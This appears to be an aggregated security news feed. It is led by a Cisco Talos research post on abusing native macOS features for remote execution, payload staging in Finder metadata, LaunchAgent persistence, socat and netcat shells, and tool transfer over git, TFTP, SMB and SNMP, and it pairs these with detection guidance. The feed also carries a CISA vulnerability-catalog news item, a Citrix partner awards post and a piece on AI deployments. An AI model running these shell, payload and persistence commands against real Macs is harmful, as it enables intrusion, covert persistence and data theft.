Tuesday, April 21, 2026

Bad Apples: Weaponizing native macOS primitives for movement and execution

  • As macOS adoption grows among developers and DevOps, it has become a high-value target; however, native "living-off-the-land" (LOTL) techniques for the platform remain significantly under-documented compared to Windows. 
  • Adversaries can bypass security controls by repurposing native features like Remote Application Scripting (RAS) for remote execution and abusing Spotlight metadata (Finder comments) to stage payloads in a way that evades static file analysis. 
  • Attackers can move toolkits and establish persistence using built-in protocols such as SMB, Netcat, Git, TFTP, and SNMP, operating entirely outside the visibility of standard SSH-based telemetry. 
  • Defenders should shift from static file scanning to monitoring process lineage and inter-process communication (IPC) anomalies, and enforce strict MDM policies to disable unnecessary administrative services.


As macOS adoption in the enterprise reaches record highs, with over 45 percent of organizations now utilizing the platform, the traditional "security through obscurity" narrative surrounding the OS has been rendered obsolete. Mac endpoints, once relegated to creative departments, are now the primary workstations for developers, DevOps engineers, and system administrators. Consequently, these machines have become high-value targets that serve as gateways to source code repositories, cloud infrastructure, and sensitive production credentials. 

Despite this shift, macOS-native lateral movement and execution tradecraft remain significantly understudied compared to their Windows counterparts. This research was conducted to address this critical knowledge gap. Through a systematic validation of native macOS protocols and system binaries, it is demonstrated how adversaries can “live off the land” (LOTL) by repurposing legitimate administrative tools. By weaponizing native primitives, such as Remote Application Scripting (RAS) and Spotlight metadata, intentional OS security features can be bypassed to transform standard system functions into robust mechanisms for arbitrary code execution and fleet-wide orchestration.

Figure 1. macOS living-off-the-land (LOTL) attack flow.

The macOS enterprise blind spot 

macOS is no longer a niche operating system. According to the Stack Overflow 2024 Developer Survey, a third of professional developers use macOS as their primary platform. These machines represent high-value pivot points, often holding source code repositories, cloud credentials, and SSH keys to production infrastructure. 

Despite this trend, the MITRE ATT&CK framework documents far fewer techniques for macOS than for Windows, and recent industry reports indicate that macOS environments prevent significantly fewer attacks than their Windows or Linux counterparts. To address this disparity, community-driven resources such as LOOBins (living-off-the-orchard binaries) have emerged to catalog native macOS binaries that can be repurposed for malicious activity. This research aims to further close that gap by systematically enumerating the native pathways available for both movement and execution.

Remote command execution: Weaponizing native primitives 

Establishing a remote shell is the first step in any post-exploitation chain. While SSH is the standard, native macOS features provide several alternatives that can bypass traditional monitoring. 

Remote Application Scripting as a Software Deployment Tool (T1072) 

Remote Application Scripting (formerly known as Remote Apple Events or RAE) was introduced to extend the capabilities of the AppleScript Inter-Process Communication (IPC) framework across a network. By utilizing the Electronic Program-to-Program Communication (“eppc”) protocol, administrative tasks and application automation can be performed on remote macOS systems. This mechanism allows a controller machine to send high-level commands to a target machine, which are then processed by the “AppleEventsD” daemon. 

The Open Scripting Architecture (OSA) is utilized as the standardized framework for this inter-application communication and automation on macOS. Through the exchange of Apple Events, this architecture enables scripts to programmatically interact with the operating system and installed applications, providing the functional foundation for the “osascript” utility. 

Traditionally, RAE is viewed as a lateral movement vector; however, this research demonstrates that it can also be utilized as a standalone Software Deployment Tool for Execution (T1072).

Adversaries attempting to use RAE for complex payloads often encounter Apple’s intentional security features, specifically the -10016 Handler Error. This restriction prevents the “System Events” application from executing remote shell commands via do shell script, even when RAE is globally enabled.

Figure 2. The -10016 Handler Error in remote application scripting.

To bypass this, a methodology was developed that treats “Terminal.app” as an execution proxy. Unlike “System Events”, “Terminal.app” is designed for shell interaction and accepts remote “do script” commands. To ensure payload integrity and bypass AppleScript parsing limitations (such as the -2741 syntax error), Base64 transport encoding is utilized. This transforms multi-line scripts into flat, alphanumeric strings that are decoded and executed in a two-stage process: 

  1. Deployment: A single RAE command instructs the remote “Terminal.app” to decode the Base64 string into a temporary path and apply chmod +x.
  2. Invocation: A second RAE command explicitly invokes the script via “bash”, ensuring a proper shell context.
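The two stages can be sketched locally, with the RAE transport omitted. In the real chain, each step below would be wrapped in an osascript `do script` command aimed at the remote “Terminal.app”; the payload contents and temporary path here are assumptions (and on macOS the decode flag is `base64 -D` rather than `-d`):

```shell
# Flatten a multi-line payload into a single alphanumeric Base64 string,
# sidestepping AppleScript's multi-line parsing limitations.
PAYLOAD=$(printf '#!/bin/bash\necho "stage complete"\n' | base64 | tr -d '\n')

# Stage 1 (deployment): decode to a temporary path and mark it executable.
echo "$PAYLOAD" | base64 -d > /tmp/stage.sh && chmod +x /tmp/stage.sh

# Stage 2 (invocation): explicitly invoke the script through bash to
# guarantee a proper shell context.
bash /tmp/stage.sh
```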
Figure 3. Terminal.app as an execution proxy for Base64 payloads.

Remote Application Scripting for Lateral Movement (T1021.005) 

While RAE can be weaponized for execution, its primary function remains the facilitation of inter-process communication (IPC) across a network. In a lateral movement context, RAE is utilized to control remote applications by targeting the “eppc://” URI. This allows for the remote manipulation of the file system or the retrieval of sensitive environmental data without the need for a traditional interactive shell. 

For example, the command in Figure 4 can be used to remotely query the Finder for a list of mounted volumes on a target machine, providing an adversary with immediate insight into the victim's network shares and external storage:

Figure 4. Remotely querying mounted volumes via RAE.

Because these actions are performed via Apple Events rather than standard shell commands, they often bypass security telemetry that focuses exclusively on process execution trees, making RAE a discreet and effective vector for lateral movement.

AppleScript execution via SSH 

AppleScript is macOS's built-in scripting language for automation. While RAE is a viable application control mechanism, Apple security controls prevent RAE from launching applications; they must already be running. Additionally, RAE must be enabled on the target. To circumvent these obstacles, osascript can be invoked directly over SSH. 
 
Passing osascript the system info command over SSH returns critical environmental details:

Figure 5. Retrieving system information via osascript over SSH.

For arbitrary command execution, AppleScript's do shell script handler can be invoked over SSH. In the following example, do shell script is used to write a file to the target:

Figure 6. Arbitrary file creation using do shell script over SSH. 
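A sketch of this pattern, with a hypothetical user and host; the inner `do shell script` handler hands its string to a shell, which can be reproduced locally without the SSH hop:

```shell
# Over SSH the full invocation would look like (host/user are assumptions):
#   ssh alice@192.168.64.5 "osascript -e 'do shell script \"echo data > /tmp/dropped\"'"
# The inner handler is equivalent to passing the string to sh:
sh -c 'echo "written via shell handler" > /tmp/dropped.txt'
cat /tmp/dropped.txt
```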

While SSH alone can accomplish shell tasks, osascript provides access to graphical user interface (GUI) automation and Finder manipulation through Apple Events IPC rather than spawning shell processes. This creates a significant telemetry gap, as most endpoint detection tooling has less visibility into IPC-driven actions than standard shell process trees.

socat remote shell 

socat (SOcket CAT) is a command line utility for establishing bidirectional data streams between two endpoints. It supports a wide range of socket types including TCP, UDP, Unix domain sockets, and pseudo terminals (pty). 

In a lateral movement context, socat can establish an interactive shell on a target without relying on SSH. The target runs a listener that binds a login shell to a TCP port with pty allocation, and the attacker connects to it from a remote machine. 

On the target, the listener spawns an interactive bash session for each incoming connection with pty forwarding:

Figure 7. Establishing a listener with PTY forwarding on the target. 

From the attacking machine, connecting to the listener provides a fully interactive terminal: 

Figure 8. Attacker connection to the socat listener.

On the target, the reuseaddr,fork options allow multiple connections and reuse of the port, while pty,stderr on the exec gives the connecting client a proper terminal with stderr output. On the sender side, raw,echo=0,icanon=0 puts the local terminal into raw mode so that control characters and signals pass through to the remote shell correctly. 
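The listener/client pair described above can be reconstructed as follows; port 4444 is an assumption, and because both commands block awaiting a connection, they are collected into a reference file rather than executed inline:

```shell
cat > /tmp/socat_shell.txt <<'EOF'
# target: bind an interactive bash to TCP 4444 with a pty, forking per client
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:'bash -li',pty,stderr

# attacker: connect with the local terminal switched into raw mode
socat file:$(tty),raw,echo=0,icanon=0 TCP:<target-ip>:4444
EOF
cat /tmp/socat_shell.txt
```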

SSH is the de facto mechanism for gaining shell access on remote hosts, and as a result, it is where most detection engineering efforts are focused. socat achieves the same outcome, fully interactive terminal access, but operates entirely outside the SSH ecosystem. There are no sshd logs, PAM authentication events, or “authorized_keys” to manage, which means detection pipelines built around SSH telemetry would not catch this activity.

Covert data transfer: Finder metadata abuse 


Writing payloads to Finder Comments 

A notable constraint of RAE is its inability to write file contents directly. To circumvent this, threat actors can abuse the Finder Comment field (“kMDItemFinderComment”) — a component of Spotlight metadata stored as an extended attribute. By storing a payload within metadata rather than the file's data fork, they can bypass traditional file-based security scanners and static analysis tools, which typically focus on executable code and script contents. 

Because Finder is scriptable over RAE, the comment of a file on a remote machine can be set via the “eppc://” protocol. By Base64 encoding a payload locally, a multi-line script can be stored within this single string field. The make new file command handles the creation of the target file, ensuring that no pre-existing file is required:

Figure 9. Setting Finder comments via RAE for payload staging.

The payload resides entirely within the Spotlight metadata, a location that remains largely unexamined by standard endpoint detection and response (EDR) solutions. This creates a stealthy staging area where malicious code can persist on the disk without triggering alerts associated with suspicious file contents. 
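The staging command can be sketched as follows. The host, credentials, and file name are assumptions, and a macOS controller with RAE enabled on the target is required, so the osascript invocation is collected into a reference file; the `$B64` placeholder stands for the flattened payload produced in the first line:

```shell
# Flatten a multi-line payload into a single string suitable for the comment field.
B64=$(printf 'echo staged payload\n' | base64 | tr -d '\n')

cat > /tmp/rae_stage.txt <<'EOF'
osascript \
  -e 'tell application "Finder" of machine "eppc://admin:pass@192.168.64.5"' \
  -e 'set f to make new file at desktop with properties {name:"notes.txt"}' \
  -e 'set comment of f to "$B64"' \
  -e 'end tell'
EOF
cat /tmp/rae_stage.txt
```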

Extraction and execution 

On the target, extraction and execution take a single line. mdls reads the comment, base64 -D decodes it, and the result is piped to “bash”: 

Figure 10. Extraction and execution of metadata-stored payloads.
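The pipe has the following shape; the macOS-specific metadata read is stubbed out here so the decode-and-execute stage can be demonstrated directly (file name is an assumption, and `-D` is the macOS spelling of the decode flag):

```shell
# On the target the one-liner would be:
#   mdls -raw -name kMDItemFinderComment notes.txt | base64 -D | bash
# Same pipe shape, with the metadata read replaced by a local encode:
printf 'echo extracted and executed\n' | base64 | base64 -d | bash
```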

Persistence via LaunchAgent 

This approach can be paired with a LaunchAgent for persistence. A plist in “~/Library/LaunchAgents” that executes the extraction chain at user login allows the payload to run automatically. 

Our initial attempt using mdls inside the LaunchAgent failed because Spotlight may not be fully initialized when LaunchAgents fire. The fix was to replace mdls with osascript calling Finder directly to read the comment:

Figure 11. Persistence via LaunchAgent and Finder metadata. 
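A minimal sketch of such a LaunchAgent plist, with an assumed label and staged-file path; the Finder read replaces mdls to avoid the Spotlight initialization issue described above:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
 "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.example.metadata</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/bash</string>
    <string>-c</string>
    <string>osascript -e 'tell application "Finder" to get comment of (POSIX file "/Users/victim/notes.txt" as alias)' | base64 -D | bash</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
</dict>
</plist>
```

Note that the plist itself carries no payload, only the extraction chain; the malicious content lives entirely in the referenced file's metadata.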

Talos confirmed this successfully executes the payload at login. It is worth noting that macOS prompts the user to approve the bash execution at login, which is a visible indicator of background activity. The plist contains no payload, only a reference to metadata, so static analysis of the LaunchAgent would not reveal the malicious content. 

Lateral Tool Transfer techniques 

Once attackers achieve execution, they must move their toolkit across the environment. Several native protocols were validated for tool transfer (T1570). 

Standard protocols: SCP and SFTP 

SCP (Secure Copy Protocol) and SFTP (SSH File Transfer Protocol) are the most straightforward methods, operating over SSH and available out-of-the-box on any macOS system with Remote Login enabled.

Figure 12. SCP file transfer syntax.
Figure 13. SFTP file transfer syntax.

SMB-based transfer 

Server Message Block (SMB) is a network file sharing protocol commonly associated with Windows environments, but macOS includes native support for both SMB client and server functionality. In a lateral movement context, an attacker can mount a remote SMB share and access its contents as if they were local files. 

This method of setting up an SMB share on the victim requires SSH access. The following command creates a shared directory, loads the SMB daemon, and creates the share.

Figure 14. Configuring a native SMB share on macOS.
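The setup can be sketched as follows; the share name and path are assumptions, and since these commands require root on a macOS victim, they are collected into a reference file:

```shell
cat > /tmp/smb_setup.txt <<'EOF'
# create the directory to be shared
mkdir -p ~/share

# load the SMB daemon
sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.smbd.plist

# register the directory as an SMB share point
sudo sharing -a ~/share -S share -s 001
EOF
cat /tmp/smb_setup.txt
```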

With the share created, the next step is mounting it from the attacker machine. Attempting this action with the mount command failed due to an authentication error.

Figure 15. Authentication error encountered during SMB mount.

To resolve this issue, GUI access to the victim machine was required. On the victim machine, navigate to System Settings > General > Sharing > File Sharing > Options, which contains an option to store the user's account password on the computer. Even though this is labeled as "Windows File Sharing", it was required to properly authenticate the user when using the mount utility. 

However, this entire GUI dependency can be avoided by using osascript to mount the share instead of mount:

Figure 16. Mounting SMB shares via osascript.

This mounts the share to “/Volumes/share” without requiring the GUI configuration step. With the share mounted, any file copied into the mount directory appears on the victim immediately. 
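The mount step uses the `mount volume` command from AppleScript's standard additions; credentials and host below are assumptions, so the one-liner is kept as a reference rather than executed:

```shell
cat > /tmp/smb_mount.txt <<'EOF'
osascript -e 'mount volume "smb://admin:pass@192.168.64.5/share"'
EOF
cat /tmp/smb_mount.txt
```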

Netcat-based transfer 

nc (netcat) is a well-known general-purpose networking utility that ships with macOS. It can be utilized to open arbitrary TCP and UDP connections, listen on ports, and pass data between them. 

The simplest pattern involves piping commands directly into a netcat listener. On the target, a listener is established that pipes incoming data directly to sh:

Figure 17. Netcat listener established on victim machine.

From the attacking machine, a command is then echoed into nc targeting the victim's IP and port:

Figure 18. Command execution via Netcat (attacker side).
Figure 19. Command execution via Netcat (victim side).

The attacker sends the curl google.com command over the wire, which is caught by the victim's listener and executed by sh. The resulting output confirms successful execution on the target. 

Netcat can also facilitate file transfers through several different methods. An attacker could invoke a fetch to a remote system where a script or payload is hosted, or start a simple HTTP server on their own machine to perform ad hoc tool transfer.

Figure 20. Serving files via Netcat (attacker terminal 1).
Figure 21. Initiating file transfer via Netcat (attacker terminal 2).
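The serve/fetch pair can be reconstructed as follows; port and file name are assumptions, and because both ends block on the connection, the commands are collected into a reference file:

```shell
cat > /tmp/nc_transfer.txt <<'EOF'
# attacker terminal 1: serve the tool on TCP 8080
nc -l 8080 < tool.bin

# attacker terminal 2 / victim: connect and write the stream to disk
nc <attacker-ip> 8080 > tool.bin
EOF
cat /tmp/nc_transfer.txt
```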

Git-based transfer 

git is a version control system ubiquitous in software development. Its prevalence on developer machines and reliance on SSH as a transport make git push a practical file transfer mechanism. The technique requires initializing a repository on the target and setting receive.denyCurrentBranch to updateInstead. By default, git refuses pushes to a branch that is currently checked out on the remote. This setting overrides that behavior and updates the working tree on push, landing files on disk the moment the operation completes. 

First, a receiving repository is initialized on the target over SSH:

Figure 22. Initializing a Git repository on the target.

On the attacker, a local repository is created with the payload, and the remote is pointed at the target:

Figure 23. Pushing payloads to the target via Git. 

After the push, “script.sh” exists on the target at “~/repos/project/script.sh”. Additional file transfers only require adding new files, committing, and pushing again. Because git operates over SSH, the transfer is encrypted and uses the same authentication established for command execution. 
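The full flow can be demonstrated with two local repositories standing in for the SSH endpoints; the directory names and payload are illustrative, and over the network the remote URL would be an ssh:// path to the target instead:

```shell
rm -rf /tmp/git_push_demo && mkdir -p /tmp/git_push_demo
cd /tmp/git_push_demo

# "target": a checked-out repo that accepts pushes to its current branch
# and updates the working tree in place.
git init -q -b main target
git -C target config receive.denyCurrentBranch updateInstead

# "attacker": commit the payload and push it straight onto the target branch.
git init -q -b main attacker
git -C attacker config user.email attacker@example.com
git -C attacker config user.name attacker
echo 'echo payload' > attacker/script.sh
git -C attacker add script.sh
git -C attacker commit -qm 'add tool'
git -C attacker push -q ../target main

# The file now exists in the target's working tree.
cat target/script.sh
```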

TFTP (Standard and unprivileged) 

TFTP (Trivial File Transfer Protocol) is a lightweight, unauthenticated file transfer protocol that operates over UDP. macOS includes both a TFTP server and client. The server is not active by default but can be started through launchd.

With root access on the target, the system's built-in TFTP plist activates the server in a single command:

Figure 24. Activating the native TFTP server.

This serves “/private/tftpboot” on the standard TFTP port (UDP 69). The TFTP system plist does not provide the -w flag to the tftpd process. Without it, the server only allows writes to files that already exist. A placeholder file must be created on the target for each file being transferred:

Figure 25. Creating a placeholder file for TFTP transfer.

From the attacker, the payload is pushed to the target: 

Figure 26. Pushing payload to target via TFTP.
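The root-variant flow can be sketched end to end; the target IP and file name are assumptions, and since the server-side commands require root on macOS, the sequence is collected into a reference file:

```shell
cat > /tmp/tftp_flow.txt <<'EOF'
# on the target (root): activate the built-in server, serving /private/tftpboot
sudo launchctl load -w /System/Library/LaunchDaemons/tftp.plist

# on the target: pre-create a writable placeholder (the system plist omits -w)
sudo touch /private/tftpboot/tool.bin && sudo chmod 666 /private/tftpboot/tool.bin

# on the attacker: push the payload over UDP 69
tftp 192.168.64.5 <<'TFTP'
put tool.bin
TFTP
EOF
cat /tmp/tftp_flow.txt
```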

In a post-exploitation scenario without root access, tftpd can still be deployed by loading a user-created plist from “/tmp” on a non-standard port. This variant passes the tftpd -w flag, which allows write requests to create new files, removing the placeholder requirement. 

Figure 27. Non-root TFTP server deployment.

SNMP trap-based transfer 

SNMP (Simple Network Management Protocol) is used for monitoring and managing network devices. SNMP traps are unsolicited notifications sent from agents to a management station over UDP port 162. The trap payload can carry arbitrary string data under custom OIDs, which can be repurposed as a data transfer channel. macOS ships with the necessary net-snmp tools: snmptrap (“/usr/bin/snmptrap”) on the sender and snmptrapd (“/usr/sbin/snmptrapd”) on the receiver. 

The approach works by Base64 encoding a file, splitting it into fixed-size chunks, and sending each chunk as an SNMP trap payload under a custom OID in the private enterprise space (“1[.]3[.]6[.]1[.]4[.]1[.]99999”). A trap handler on the receiving end reassembles the chunks and decodes the file. The protocol uses three message types: “FILENAME” signals the start of a transfer, “DATA” carries a Base64 chunk, and “END” triggers reassembly. 
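The chunking and reassembly logic can be demonstrated locally. In the real transfer, each line of the chunk file would ride in one DATA trap; the chunk size, receiver address, and community string below are assumptions, and the commented snmptrap invocation follows standard net-snmp syntax:

```shell
# Each chunk would be sent roughly as:
#   snmptrap -v 2c -c public 192.168.64.5 '' 1.3.6.1.4.1.99999 \
#       1.3.6.1.4.1.99999.2 s "$chunk"
printf 'tool bytes to move' > /tmp/tool.bin

# sender: Base64 encode and split into fixed-size chunks
base64 < /tmp/tool.bin | tr -d '\n' | fold -w 64 > /tmp/chunks.txt

# receiver: on END, concatenate the DATA chunks in order and decode
tr -d '\n' < /tmp/chunks.txt | base64 -d > /tmp/tool.rebuilt
cmp -s /tmp/tool.bin /tmp/tool.rebuilt && echo "files match"
```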

On the receiver, a trap handler processes incoming traps:

Figure 28. SNMP trap handler logic.

The snmptrapd daemon is then configured on the target to route all incoming traps to the handler and started in the foreground:

Figure 29. Configuring the snmptrapd daemon.

On the sender, a script handles the encoding, chunking, and transmission. Each chunk is sent as a separate SNMP trap with a short delay between sends to avoid overwhelming the receiver:

Figure 30. Script for SNMP chunking and transmission. 

The sender initiates the transfer: 

Figure 31. Initiating data transfer via SNMP traps.

The target receives the transfer:

Figure 32. Successful payload reassembly on target.

The matching MD5 hashes confirm the file was transferred and reassembled intact. 

Socat file transfer 

The socat shell established in the “socat remote shell” section above can also serve as a file transfer channel. Because the listener provides a fully interactive bash session, file contents can be written to the remote host by injecting a heredoc through the connection. This means socat alone handles both remote command execution and tool transfer without requiring any additional services or listeners. 

With the socat listener running on the target, the attacker delivers a file by piping a heredoc-wrapped cat command through a socat connection:

Figure 33. File delivery via socat heredoc injection.
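The injected stream has the following shape; here it is piped into a local sh rather than `socat - TCP:<target-ip>:4444`, to show the heredoc landing the file on disk (the delivered path and contents are illustrative):

```shell
# The heredoc-wrapped cat, as it would travel over the socat connection:
printf '%s\n' \
  "cat > /tmp/delivered.sh <<'MARK'" \
  "echo tool delivered" \
  "MARK" | sh
cat /tmp/delivered.sh
```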

Detection and defensive considerations 

Defending against LOTL techniques requires a shift from simple network alerts to granular process and metadata analysis. 

Network indicators 

Inbound TCP traffic on port 3031 (the “eppc” port) and unusual SNMP/TFTP traffic on internal LAN segments should be monitored for potential unauthorized activity. 

Endpoint indicators (EVM) 

Through mapping to the Open Cybersecurity Schema Framework (OCSF), an open-source effort to deliver a simplified and vendor-agnostic taxonomy for security telemetry, high-fidelity signatures for these behaviors were identified: 

  • Suspicious lineage: Process trees following the pattern launchd -> AppleEventsD -> Terminal -> sh/bash. 
  • Metadata monitoring: Frequent or unusual calls to mdls or writes to “com.apple.metadata:kMDItemFinderComment”. 
  • Command line anomalies: base64 --decode commands originating from GUI applications or osascript executions containing “of machine "eppc://..."” arguments. 

Native security controls and hardening recommendations 

Several built-in macOS security mechanisms can be configured to mitigate the risks associated with native primitive abuse: 

  • Transparency, Consent, and Control (TCC) restrictions: The "Automation" category within TCC is designed to regulate inter-application communication. By enforcing strict TCC policies via Mobile Device Management (MDM), unauthorized Apple Events between applications — such as a script attempting to control “Terminal.app” or “Finder” — can be blocked. 
  • MDM Policy Enforcement: RAE and Remote Login (SSH) should be disabled by default across the fleet. These services can be managed and restricted using MDM configuration profiles (e.g., the “com.apple.RemoteAppleEvents” payload) to ensure they are only active on authorized administrative hosts. 
  • Service hardening: Unnecessary network-facing services, such as tftpd and snmpd, should be explicitly disabled. The removal of these launchd plists from “/System/Library/LaunchDaemons” (where permitted by System Integrity Protection) or the use of launchctl disable commands prevents their use as ad-hoc data transfer channels. 
  • Application firewall and Stealth Mode: The built-in macOS application firewall should be enabled and configured in "Stealth Mode." This configuration ensures the device does not respond to unsolicited ICMP or connection attempts on common ports, reducing the visibility of the endpoint during internal reconnaissance. 

Conclusion 

The research presented in this article underscores a fundamental reality of modern endpoint security. The same primitives designed for administrative convenience and system automation are often the most potent tools in an adversary's arsenal. By moving beyond traditional exploit-based attacks and instead living off the land, attackers can operate within the noise of legitimate system activity.

From the weaponization of the “eppc” protocol to the creative abuse of Spotlight metadata and SNMP traps, it is clear that the macOS attack surface is both vast and nuanced. These techniques demonstrate that even within a "walled garden" ecosystem, native pathways for movement and execution remain accessible to those who understand the underlying architecture. 

For defenders, the primary takeaway is that visibility remains the most effective deterrent. By shifting focus from static file analysis to the monitoring of process lineage, inter-process communication, and metadata anomalies, these "bad Apples" can be identified and neutralized. As macOS continues its expansion into the enterprise core, the documentation and detection of these native techniques must remain a priority for the security community. 



from Cisco Talos Blog https://ift.tt/aSlLHph
via IFTTT

CISA Adds 8 Exploited Flaws to KEV, Sets April-May 2026 Federal Deadlines

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added eight new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, including three flaws impacting Cisco Catalyst SD-WAN Manager, citing evidence of active exploitation.

The list of vulnerabilities is as follows -

  • CVE-2023-27351 (CVSS score: 8.2) - An improper authentication vulnerability in PaperCut NG/MF that could allow an attacker to bypass authentication on affected installations via the SecurityRequestFilter class.
  • CVE-2024-27199 (CVSS score: 7.3) - A relative path traversal vulnerability in JetBrains TeamCity that could allow an attacker to perform limited admin actions.
  • CVE-2025-2749 (CVSS score: 7.2) - A path traversal vulnerability in Kentico Xperience that could allow an authenticated user's Staging Sync Server to upload arbitrary data to path relative locations.
  • CVE-2025-32975 (CVSS score: 10.0) - An improper authentication vulnerability in Quest KACE Systems Management Appliance (SMA) that could allow an attacker to impersonate legitimate users without valid credentials. 
  • CVE-2025-48700 (CVSS score: 6.1) - A cross-site scripting vulnerability in Synacor Zimbra Collaboration Suite (ZCS) that could allow an attacker to execute arbitrary JavaScript within the user's session, resulting in unauthorized access to sensitive information.
  • CVE-2026-20122 (CVSS score: 5.4) - An incorrect use of privileged APIs vulnerability in Cisco Catalyst SD-WAN Manager that could allow an attacker to upload and overwrite arbitrary files on the affected system and gain vmanage user privileges.
  • CVE-2026-20128 (CVSS score: 7.5) - A storing passwords in a recoverable format vulnerability in Cisco Catalyst SD-WAN Manager that could allow an authenticated, local attacker to gain DCA user privileges by accessing a credential file for the DCA user on the filesystem as a low-privileged user.
  • CVE-2026-20133 (CVSS score: 6.5) - An exposure of sensitive information to an unauthorized actor vulnerability in Cisco Catalyst SD-WAN Manager that could allow remote attackers to view sensitive information on affected systems.

It's worth noting that CISA added CVE-2024-27198, another flaw impacting on-premise versions of JetBrains TeamCity, to the KEV catalog in March 2024. It's not known at this stage if both vulnerabilities are being exploited together and if the activity is the work of the same threat actor.

The exploitation of CVE-2023-27351, on the other hand, was attributed to Lace Tempest in April 2023 in connection with attacks delivering Cl0p and LockBit ransomware families.

As for CVE-2025-32975, Arctic Wolf said it observed unknown threat actors weaponizing the bug to target unpatched SMA systems as recently as last month, although the exact end goals of the campaign remain unknown.

Cisco, for its part, also said it became aware of the exploitation of CVE-2026-20122 and CVE-2026-20128 in March 2026. The company has yet to revise its advisory to reflect the in-the-wild abuse of CVE-2026-20133.

In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies have been recommended to address the three Cisco vulnerabilities by April 23, 2026, and the rest by May 4, 2026.



from The Hacker News https://ift.tt/Xq3FrMD
via IFTTT

Monday, April 20, 2026

Celebrating the Partners powering Citrix forward

At Citrix UNITE, we had the opportunity to recognize what sits at the very heart of our business: our partners.

The Citrix Partner of the Year Awards celebrate organizations across our ecosystem who go above and beyond to help customers modernize work, strengthen security, and deliver exceptional digital experiences. From global systems integrators to regional specialists and partners, this year’s winners reflect the incredible breadth, depth, and diversity of the Citrix partner community.

What stood out most at UNITE wasn’t just the innovation on display—it was the sheer range of partners supporting Citrix customers around the world. Different geographies. Different business models. Different strengths. One shared commitment to customer success.

As Hector Lima, Co-President of Citrix, shared:

“Partners are fundamental to how Citrix shows up for customers every day. What makes this community so powerful is the diversity of organizations supporting our work—from global leaders to regional experts, each bringing unique strengths to the table. We’re incredibly proud to recognize this year’s award winners and the impact they’re making with our customers.”

The Partner of the Year Awards are more than a moment of recognition; they’re a reflection of how we work. Citrix is built to partner, and our strategy is shaped by collaboration, trust, and shared outcomes.

To all of this year’s winners: thank you for your leadership, your innovation, and your continued investment in the Citrix partnership. We’re proud to celebrate you and even more excited about what we’ll build together next.

Citrix Partner of the Year award winners for FY25

  • Customer Growth Partner of the Year
    • North America: BlueAlly Technology Solutions
    • Europe: SoftwareOne
  • Technical Service Partner of the Year
    • North America: e360
    • Europe: Atea
  • Evangelist Partner of the Year
    • North America: Altanora Systems Inc.
    • Europe: Danoffice IT Solutions & Services
  • Arrow Partner of the Year
    • North America: Envision
    • Europe: SoftwareOne
  • Global Systems Integrator Awards
    • GSI Partner of the Year: HCLTech
    • GSI Innovation Award: Wipro
  • International & Represented Markets Awards
    • Strategic Partner of the Year: CXA (ASEAN Markets)
  • Individual Excellence Awards
    • Strategic Partner Sales Executive of the Year: Nalia Silva – New Cloud Technologies (Latin America)
    • Strategic Partner Technology Specialist of the Year: Yair Biton – Innocom / Aman Group (Middle East & Central Asia)


from Citrix Blogs https://ift.tt/1jAa5UM
via IFTTT

Why Most AI Deployments Stall After the Demo

The fastest way to fall in love with an AI tool is to watch the demo.

Everything moves quickly. Prompts land cleanly. The system produces impressive outputs in seconds. It feels like the beginning of a new era for your team.

But most AI initiatives don't fail because of bad technology. They stall because what worked in the demo doesn't survive contact with real operations. The gap between a controlled demonstration and day-to-day reality is where teams run into trouble.

Most AI product demos are built to highlight potential, not friction. They use clean data, predictable inputs, carefully crafted prompts, and well-understood use cases. Production environments don't look like that. In real operations, data is messy, inputs are inconsistent, systems are fragmented, and context is incomplete. Latency matters. Edge cases quickly outnumber ideal ones. This is why teams often see an initial burst of enthusiasm followed by a slowdown once they try to deploy AI more broadly.

What actually breaks in production

Once AI moves from demo to deployment, a few specific challenges tend to emerge.

Data quality becomes a real issue. In security and IT environments, data is often spread across multiple tools with different formats and varying levels of reliability. A model that performs well on clean demo data can struggle when fed noisy or incomplete inputs.

Latency becomes visible. A model that feels fast in isolation can introduce meaningful delays when embedded in multi-step workflows running at scale.

Edge cases start to matter. Production workflows include exceptions, unusual scenarios, and unpredictable user behavior. Systems that handle common cases well can break down quickly when confronted with real-world complexity.

Integration becomes a limiting factor. Most operational work requires coordinating across multiple systems. If an AI tool can't connect deeply into those workflows, its impact stays limited regardless of how capable the underlying model is.

Governance is where enthusiasm runs out

Beyond technical challenges, governance has become one of the biggest reasons AI initiatives stall. With general-purpose AI tools now widely accessible, organizations are grappling with serious questions around data privacy, appropriate use cases, approval processes, and compliance requirements.

Many teams discover that while AI experimentation is easy, operationalizing AI safely requires clear policies and controls. Without them, even promising initiatives get stuck in review cycles or fail to scale. 

When done properly, governance transcends its goal of preventing misuse. It becomes a framework that lets teams move quickly and confidently, with appropriate oversight built in from the start.

What determines whether AI actually delivers

Teams that successfully move beyond the demo tend to share a few habits. They test AI against real workflows rather than idealized scenarios, using real data, real processes, and real constraints. They evaluate performance under realistic conditions, measuring accuracy under load, monitoring latency, and understanding how the system behaves when inputs vary. They prioritize integration depth, because AI operating in isolation rarely has much impact. And they pay close attention to the cost model, since AI usage can scale quickly and without visibility into consumption, costs can become a blocker.

Perhaps most importantly, they invest in governance early. Clear policies, guardrails, and oversight mechanisms help teams avoid delays and build confidence in their deployments.

A practical checklist before you commit

If you're evaluating AI tools, a few steps can help surface limitations before they become blockers: run proofs of concept on high-impact, real-world workflows; use realistic data during testing; measure performance across accuracy, latency, and reliability; assess integration depth with your existing stack; and clarify governance requirements upfront.

These aren't complicated steps, but they make a significant difference in whether a promising demo leads to meaningful production deployment.

Access the IT and security field guide to AI adoption.

The bottom line

AI has real potential to change how security and IT teams work. But success depends less on the sophistication of the model and more on how well it fits into real workflows, integrates with existing systems, and operates within a clear governance framework. Teams that recognize this early are far more likely to move from experimentation to lasting impact.

Looking for a structured approach to evaluating AI tools in practice? The IT and security field guide to AI adoption walks through selection criteria, evaluation questions, and a step-by-step process for finding solutions that hold up beyond the demo.

This article is a contributed piece from one of our valued partners.



from The Hacker News https://ift.tt/MfhFL71
via IFTTT

Fracturing Software Security With Frontier AI Models

Introduction

